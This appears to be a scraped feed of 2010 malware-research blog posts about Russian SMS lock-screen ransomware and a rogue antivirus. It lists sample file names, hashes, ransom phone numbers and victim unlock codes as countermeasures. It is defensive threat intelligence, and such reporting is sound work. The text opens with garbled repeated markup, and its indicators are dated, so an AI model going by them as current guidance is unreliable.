<a href="http://www.virustotal.com/file-scan/report.html?id=55d9afec1ad24fcfec03f03cbc7be9b6c21a614db87432e925cdc8112c551c5e-1295996949"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><i><a href="http://www.blogger.com/post-edit.g?blogID=1670645896303580754&postID=8435682174595767666"> <span style="color: orange;">id=55d9afec1ad24fcfec03f03cbc7be9b6c21a614db87432e925cdc8112c551c5e-1295996949</span></a></i><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=73cc47196be7bd8c0f7764a46cb4488266bef2ea1ffccbdbd91cd0b62c79919d-1295997136"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><i><a href="http://www.blogger.com/post-edit.g?blogID=1670645896303580754&postID=8435682174595767666"> <span style="color: orange;">id=73cc47196be7bd8c0f7764a46cb4488266bef2ea1ffccbdbd91cd0b62c79919d-1295997136</span></a></i><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=26f542326786e4facd624fcb170a71c6a2e709e23c8f4cffa4715e133869316b-1295980568"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><i><a href="http://www.blogger.com/post-edit.g?blogID=1670645896303580754&postID=8435682174595767666"> <span style="color: orange;">id=26f542326786e4facd624fcb170a71c6a2e709e23c8f4cffa4715e133869316b-1295980568</span></a></i><br />
<a href="http://www.virustotal.com/file-scan/report.html?id=8f5c8ad99ded74d3cc233b691a803fc6f00ac3113ad67c6f6802ac3ea0f727fc-1295389644"><i><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></i></a><i><a href="http://www.blogger.com/post-edit.g?blogID=1670645896303580754&postID=8435682174595767666"> <span style="color: orange;">id=8f5c8ad99ded74d3cc233b691a803fc6f00ac3113ad67c6f6802ac3ea0f727fc-1295389644</span></a></i><br />
<br />
<communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com><communications_msn_cs_ptbr@microsoft.windowslive.com> Bruno Caseiro<br />
Malware Researcher<br />
</communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com></communications_msn_cs_ptbr@microsoft.windowslive.com><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1670645896303580754.post-66825174880332099342010-10-27T17:07:00.000+01:002010-10-27T17:07:57.530+01:00SMS Ransomware. From Russia to the world<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s1600/MI-ransom_23102010.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<div style="text-align: justify;">The new generation of malicious code designed to increase the economic life of criminal groups through exercises that involve sending a text SMS message rate, is now a pattern that has already spread worldwide.<br />
<br />
While this type of ransomware is developed for the Russian-speaking public, being a very common malware in Russia, any user anywhere in the world is a potential victim.<br />
<br />
Daily offenders change the graphic design of what is shown on screen, although minimalist very aggressive, and always providing the necessary information so that, in theory, the victim can get the key to unlock access to the operating system, clear that exchange for a sum of money in this case, amounts to 360 rubles (just over $ 10).</div><br />
<div style="text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s1600/MI-ransom_23102010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TMhNJMqDItI/AAAAAAAAAag/_RG_7j1iNJ8/s400/MI-ransom_23102010.png" width="400" /></a><br />
<b>SMS Ransomware template</b><br />
<i>The latest campaign to spread and infection of this family of ransomware, occurs with this design.</i></div><br />
<div style="text-align: justify;">The truth is that despite not having a complex structure around its development; represent one of the malicious codes more aggressive and invasive. Not only because by blocking the system also blocks the ability to access any functionality and operating system software, but also while the user looks ransomware design, it’s reported against an affiliate business (usually the type Pay-per-Install), and in some cases, trying to steal information related to authentication credentials.</div><b><br />
Related Information</b><br />
<div style="color: orange;"><a href="http://malwaredisasters.blogspot.com/2010/10/new-variante-of-sms-ransomware-itw.html">New variant of SMS Ransomware ItW</a></div><a href="http://malwaredisasters.blogspot.com/2010/09/microsoft-security-antivirus-ransomware.html" style="color: orange;">Microsoft Security Antivirus ransomware</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-52145011826950163222010-10-21T04:07:00.000+01:002010-10-22T05:00:08.848+01:00New variant of SMS Ransomware ItW<div style="text-align: justify;">Malicious code types Ransomware have become more emphatically positioned on the stage of the business malicious round about malware.<br />
<br />
In this respect, far left the programs in this style using complex encryption algorithms exploiting conventional aspects of cryptovirologhy, to meet at the present with a sort of ransomware seeking to block access to the victim operating system, calling for minimum sums but daily feed back the economy by criminal groups.</div><br />
This time, the template used is referred to in the following screenshot:<br />
<div style="text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TL-tdvpmjpI/AAAAAAAAAac/2OYrncoppA0/s1600/MIransom201002010.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TL-tdvpmjpI/AAAAAAAAAac/2OYrncoppA0/s400/MIransom201002010.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware</b><br />
<i>New variant of SMS Ransomware requesting the sum of 400 rublos (Russian money)</i></div><br />
<div style="text-align: justify;">This new variant is another example similar to the family those previously propagated, with the particularity of incorporating number keys on-screen, needed to "write" the number that will unlock the system.<br />
<br />
This maneuver isn't capricious and responds to the strategic defensive and evasive to block the use of the keyboard, precluding any attempt to access internal programs of the affected system.<br />
<br />
Although this new generation of ransomware aggressive approach does not address the abduction expressed by old programs in this category as GPCode malware, but is an extremely invasive and difficult to eradicate if it does not provide preventive tools available to protect infections of this caliber.</div><br />
<b>Related Information </b><br />
<br />
<a href="http://twitter.com/jorgemieres" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a><a href="http://malwaredisasters.blogspot.com/2010/09/microsoft-security-antivirus-ransomware.html" style="color: orange;">Microsoft Security Antivirus ransomware</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-18062899265682402522010-09-14T00:59:00.000+01:002010-09-14T15:36:05.618+01:00Microsoft Security Antivirus ransomware<div style="text-align: justify;">Criminal groups from Russia are trying constantly to raise money fraudulently, maliciously re-launched a proposal through a ransomware. In this case, the strategy is to display a window that is positioned in the center of the desktop, displaying a message in Russian under the title "<b>Microsoft Security Antivirus</b>".</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TI64Ud80dcI/AAAAAAAAAZU/H66fw-Y_kgE/s1600/MI_MSA-Ransom.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/TI64Ud80dcI/AAAAAAAAAZU/H66fw-Y_kgE/s320/MI_MSA-Ransom.png" /></a></div><div style="text-align: center;"><b>Ransomware opening message</b><br />
<i>The window displayed by the ransomware is located in the center of the screen and block any possibility to access Windows programs</i></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TI65PV_LzxI/AAAAAAAAAZc/wF7w7WL0ACk/s1600/MI_ransom-400.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><br />
<div style="text-align: justify;">This malware is part of the same family that has plagued Internet ransom and are expressed through different designs, some more aggressive than others but ultimately with the same magnitude of risk and same objectives.<br />
<br />
Although this variant does not endorse any websites with pornographic content, claims his reward through a text message SMS rate in this case, the number <b>89030064850</b>. The reward consists of being the payment of <b>400 rubles</b> (Russian currency).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TI65PV_LzxI/AAAAAAAAAZc/wF7w7WL0ACk/s1600/MI_ransom-400.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TI65PV_LzxI/AAAAAAAAAZc/wF7w7WL0ACk/s320/MI_ransom-400.png" /></a></div><div style="text-align: center;"><b>Reward Request</b><br />
<i>In this way the offender makes an economic profit at the expense of a mechanism fraudulent and illegal, in many cases, requires users to pay the amount of money without a guarantee that you will receive the unlock key</i></div><br />
<br />
<div style="text-align: justify;">The ransomware have become commonplace, providing a highly resource exploited by computer criminals who through affiliate systems collect the profits and manage the spread of the threat using specific crimeware.<br />
<br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
<a href="http://siri-urz.blogspot.com/" style="color: orange;">S!Ri</a> has published some unlock codes can be used to regain control of the system. Thanks S!Ri<br />
<br />
Number to Call: <b>89030139823</b><br />
Number to Call: <b>89030065742</b><br />
Code to unlock Windows: <b>77294738T</b><br />
<br />
Number to Call: <b>89030064258</b><br />
Number to Call: <b>89030064960</b><br />
Number to Call: <b>89030065384</b><br />
Number to Call: <b>89030139997</b><br />
Code to unlock Windows: <b>720194320Q</b></div><br />
<b>Related Information</b><br />
<br />
<a href="http://twitter.com/jorgemieres" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a><a href="http://malwaredisasters.blogspot.com/2010/09/new-sms-ransomware-template-with-slight.html" style="color: orange;">New SMS ransomware template with slight change</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-89836725556308271072010-09-09T03:15:00.000+01:002010-09-09T03:15:15.230+01:00New SMS ransomware template with slight change<div class="separator" style="clear: both; text-align: justify;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBdiVMsWI/AAAAAAAAAYs/gKIL4ymHy-w/s1600/MI_ransom-350.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;"></div><div style="text-align: justify;">Recently a new variant of SMS ransomaware family that spread and promote pornographic sites, is In-the-Wild presenting a superficial makeover.</div><br />
<div style="text-align: justify;">Several weeks ago a campaign is active through which spreads a variant of this type of ransomware, which displays a black window covering the entire desktop. This time, the window does not cover the entire desktop but is located in the center of it, but disables any possibility to access any of the applications of the system.</div><br />
<div style="text-align: justify;">As in previous campaigns for the release request to send an SMS message such as a certain number requesting the sum of, according to the variants detected so far, 350, 400 and 410 rubles (Russian money).</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBdiVMsWI/AAAAAAAAAYs/gKIL4ymHy-w/s1600/MI_ransom-350.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBdiVMsWI/AAAAAAAAAYs/gKIL4ymHy-w/s400/MI_ransom-350.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBroubxCI/AAAAAAAAAY0/_8UWsXIxqVg/s1600/MI_ransom-400.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: center;"><b>SMS </b><b>Ransomaware </b><b>asking for 350 rubles </b></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBroubxCI/AAAAAAAAAY0/_8UWsXIxqVg/s1600/MI_ransom-400.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="221" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIhBroubxCI/AAAAAAAAAY0/_8UWsXIxqVg/s400/MI_ransom-400.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomaware asking for 400 rubles </b></div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
<div style="text-align: justify;">For cases where the requested ransomware 410 rubles for a key to unlock the system can use any of the following keys to unlock provided <a href="http://siri-urz.blogspot.com/" style="color: orange;">by SiR! from his blog</a> (thanks SiR!):</div><br />
Number to Call: <b>89654028516</b><br />
Number to Call: <b>89654028759</b><br />
Number to Call: <b>89654028794</b><br />
Code to unlock Windows: <b>403947563!</b><br />
<br />
Number to Call: <b>89654028519</b><br />
Code to unlock Windows: <b>$334327890$</b><br />
<br />
Number to Call: <b>89654028477</b><br />
Number to Call: <b>89654028491</b><br />
Number to Call: <b>89654028518</b><br />
Code to unlock Windows: <b>$009264834$</b><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/09/campaign-to-disseminate-russian.html"><span style="color: orange;">Campaign to disseminate russian ransomware</span> </a><a href="http://twitter.com/jorgemieres" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
<b>Jorge Mieres</b> <br />
Founder & Director of <b>Malware<span class="blue">Intelligence</span></b> <br />
Crimeware & Intelligence Analyst Researcher<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1670645896303580754.post-17742258219938498812010-09-03T03:18:00.000+01:002010-09-03T16:34:25.120+01:00Campaign to disseminate russian ransomware<div class="separator" style="clear: both; text-align: left;"><b>Updated 09/03/2010</b></div><div style="text-align: justify;">S!Ri is doing a great job getting information needed to unlock this and other variants of ransomaware. Has kindly agreed to share with us their work by providing an update with new codes. Great job S!Ri and thank you very much for sharing data :)</div><div class="separator" style="clear: both; text-align: left;"></div><div class="separator" style="clear: both; text-align: left;"><br />
Number to Call: <b>89654028569</b><br />
Number to Call: <b>89654028703</b><br />
Code to unlock Windows: <b style="color: black;">!8912034'</b></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;">Number to Call: <b>89654028578</b><br />
Number to Call: <b>89654028597</b><br />
Number to Call: <b>89654028594</b><br />
Number to Call: <b>89654028566</b><br />
Number to Call: <b>89654028563</b><br />
Number to Call: <b>89654028583</b><br />
Number to Call: <b>89654028725</b><br />
Number to Call: <b>89654028717</b><br />
Number to Call: <b>89654028703</b><br />
Code to unlock Windows: <b style="color: black;">(30958374)</b></div><div class="separator" style="clear: both; text-align: left;"><b style="color: red;"> </b><b style="color: red;"> </b></div><div class="separator" style="clear: both; text-align: left;"></div><div class="separator" style="clear: both; text-align: left;"></div><div class="separator" style="clear: both; text-align: left;"></div><div class="separator" style="clear: both; text-align: left;">Number to Call: <b>89654028562</b><br />
Number to Call: <b>89654028563</b><br />
Number to Call: <b>89654028590</b><br />
Number to Call: <b>89654028595</b><br />
Number to Call: <b>89654028598</b><br />
Number to Call: <b>89654028578</b><br />
Number to Call: <b>89654028614</b><br />
Number to Call: <b>89654028723</b><br />
Code to unlock Windows: <b style="color: black;">~2058205~</b><br />
<br />
You can find more information about the type ransomware malware and rogue on his blog:</div><div class="separator" style="clear: both; text-align: left;"><a href="http://siri-urz.blogspot.com/" style="color: orange;">http://siri-urz.blogspot.com</a></div><div style="text-align: justify;"><br />
<b>Original 09/02/2010</b> <br />
Every so often a new ransomware campaign designed to block access to the operating system by displaying a message which requests to send a text message SMS rate to a certain number, in theory, to receive a key to regain control access to the system.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIBYViizOsI/AAAAAAAAAW0/zjrSUKQeM0E/s1600/MI_ransom-russian.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="http://4.bp.blogspot.com/_Mcy4oUq8gAQ/TIBYViizOsI/AAAAAAAAAW0/zjrSUKQeM0E/s400/MI_ransom-russian.png" width="400" /></a></div><div style="text-align: center;"><b>SMS Ransomware</b><br />
<i>The window occupies the whole screen by closing access to any program. When you enter the correct password, the window disappears and the binary executable is self-eliminated.</i></div><br />
<div style="text-align: justify;">The distribution of this ransomware is being carried out since late July and so far has more campaigns. All show the same message and design style, but change the phone number to be sent the text message. Some of the executables that are part of this campaign are:</div><br />
<ul><li><b>vip_porno_12730.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=153b5e59b4443b0832cab7456a88891c8fb1eb04c2f3e05a3a13084b5909dd62-1283384334" style="color: orange;">5b1d7ce7acf6de3e8b7d856bdc6127ba</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_49873.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=13e9befa760ee385be462809f33f26488f24e7e17dec865362503b2dc3a7d59c-1283356844" style="color: orange;">20830c687b1535aefa1f281fb1c6a513</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_79341.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=ab7500389535531b13b079004d983c563368e242586c6f0074af28bb809a5f7a-1283440320" style="color: orange;">6e4ecc96a88e36c9ec12d4b500aef331</a>) - <b>PornoBlocker/LockScreen</b></li>
<li><b>vip_porno_81380.avi.exe</b> (<a href="http://www.virustotal.com/file-scan/report.html?id=e2b49e20de75631bdd79296ff05a0ea0eee4156b48cb8d5c90743849f8b81f54-1283261573" style="color: orange;">3c637427af826f877a50c5a8763fe4f0</a>) - <b>PornoBlocker/LockScreen</b></li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TIBZUSAzKdI/AAAAAAAAAW8/xXf3mAOrNqo/s1600/MI_100rubles.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a></div><div style="text-align: justify;">The business of the offender is the percentage of money that is carried by each SMS that is recorded at these different numerical ranges, sent by the victims. The amount of money requested by the offender through the message to aspire to unlock access to the system is 400 rubles. That sum is expressed in Russian currency (рубль) and its equivalent in U.S. dollars is $ 13.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TIBZUSAzKdI/AAAAAAAAAW8/xXf3mAOrNqo/s1600/MI_100rubles.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="175" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TIBZUSAzKdI/AAAAAAAAAW8/xXf3mAOrNqo/s400/MI_100rubles.jpg" width="400" /></a></div><br />
<div style="text-align: justify;">In all campaigns has appeared so far of this variant of ramsomware, provided the amount requested was 400 rubles.</div><br />
<div style="text-align: justify;">Another peculiarity is that it belongs to the generation of ransom whose dissemination strategy is exploited using pornographic resources, either through websites or domains conditional content, using SEO strategies, are content with words that refer to the type of content referred to.</div><br />
<span style="font-size: large;"><b>Countermeasures</b></span><br />
Unlock the following codes:<br />
<br />
<b>89653625352</b><br />
Unlock code: <b>@34208923@</b><br />
<br />
<b>89653686497</b><br />
Unlock code: <b>10779401</b><br />
<br />
<b>89653276574</b><br />
Unlock code: <b>17661888</b><br />
<br />
<b>89652404438</b><br />
Unlock code: <b>!48950345!</b><br />
<br />
<b>89646283842</b><br />
Unlock code: <b>10070000008000</b><br />
<br />
<b>89636385700<br />
89636385707<br />
89636385755<br />
89636385675</b><br />
Unlock code: <b>$73747589$</b><br />
<br />
<b>89629911485<br />
89629911932<br />
89629911658<br />
89629910152<br />
89629910824<br />
89629910747<br />
89629910275<br />
89629909846</b><br />
Unlock code: <b>10200000000000003</b><br />
<br />
<b>89057635571<br />
89055280410<br />
89055280241</b><br />
Unlock code: <b>$73747589$</b><br />
<br />
<b>89055282108</b><br />
Unlock code: <b>^77723094^</b><br />
<br />
<b>Related information</b><br />
<a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;"></a><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://twitter.com/jorgemieres" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="100" src="http://3.bp.blogspot.com/_Mcy4oUq8gAQ/TEJjsQv18QI/AAAAAAAAAQc/00l0WDs0VO0/s200/follow_tw.png" width="100" /></a></div><a href="http://malwaredisasters.blogspot.com/2010/08/new-russian-sms-ransomware-in-wild.html" style="color: orange;">New Russian SMS ransomware In-the-Wild</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/sms-ransomware-porn-template-update.html" style="color: orange;">SMS Ransomware porn template update</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/07/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites IV</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/06/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites III</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/05/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites II</a> <br />
<a href="http://malwaredisasters.blogspot.com/2010/04/new-variant-of-ransomware-through-porn.html" style="color: orange;">New variant of ransomware through porn sites</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/another-very-active-sms-ransomware.html" style="color: orange;">Another very active SMS Ransomware</a><br />
<a href="http://malwaredisasters.blogspot.com/2010/03/sms-ransomware-for-windows-in-wild.html" style="color: orange;">SMS Ransomware for Windows In-the-Wild</a><br />
<br />
Jorge Mieres<div class="blogger-post-footer">https://twitter.com/MalwareInt</div>Unknownnoreply@blogger.com1tag:blogger.com,1999:blog-1670645896303580754.post-56364812130052631292010-08-31T04:05:00.000+01:002010-08-31T04:05:09.805+01:00AntiSpy Safeguard with new social engineering approach<div style="text-align: justify;"><b>AntiSpy Safeguard </b>is a new rogue that is In-the-Wild and that its spread is new coverage of using deception in a video shown and a false report in the style of the services offered by <a href="http://www.virustotal.com/" style="color: orange;">VirusTotal</a> or <span style="color: orange;">Virscan</span>.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THxwgst9gEI/AAAAAAAAAWk/TpU-QI-dh60/s1600/MI_rogue-video.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="http://2.bp.blogspot.com/_Mcy4oUq8gAQ/THxwgst9gEI/AAAAAAAAAWk/TpU-QI-dh60/s400/MI_rogue-video.png" width="400" /></a></div><div style="text-align: justify;"> </div><div style="text-align: justify;">The following image belongs to the inicial interface that is displayed in the first instance on a system infected by this rogue.</div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THxwJeQRoaI/AAAAAAAAAWU/oR0xJ9yvbpc/s1600/MI_rogue.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="http://1.bp.blogspot.com/_Mcy4oUq8gAQ/THxwJeQRoaI/AAAAAAAAAWU/oR0xJ9yvbpc/s400/MI_rogue.png" width="400" /></a></div><br />
